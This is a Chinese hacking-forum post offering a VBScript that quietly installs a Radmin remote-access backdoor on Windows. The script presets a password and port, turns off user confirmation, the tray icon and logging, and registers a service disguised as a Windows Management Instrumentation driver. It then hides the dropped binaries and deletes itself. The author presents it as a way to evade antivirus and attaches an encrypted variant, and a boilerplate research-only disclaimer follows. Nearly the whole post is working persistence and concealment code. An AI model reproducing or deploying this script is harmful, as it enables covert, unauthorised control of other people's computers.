作者:孤狐浪子
来源:红狼
在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_ strComputer & "/root/default:StdRegProv") strKeyPath = "SYSTEM/RAdmin" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM/RAdmin/v2.0" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM/RAdmin/v2.0/Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv") strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters" uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary = Array(1,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码 uBinary = Array(5,4,0,0) //端口:1029 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary = Array(10,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv") strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters" strValueName = "LogFilePath" strValue = "c:/logfile.txt" set wshshell=createobject ("wscript.shell") a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0) oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv") strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp" strValueName = "Description" strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "DisplayName" strValue = "Windows Management Instrumentation Player Drivers" oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "ImagePath" strValue = "c:/windows/system32/Exporer.exe /service" oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue set wshshell=createobject ("wscript.shell") a=wshshell.run ("net start WinManageHelp",0) b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0) c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0) d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除附件:
RAdmin.rar (1014 Bytes)
Radmin VBS加密版.rar (1.4 KB)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论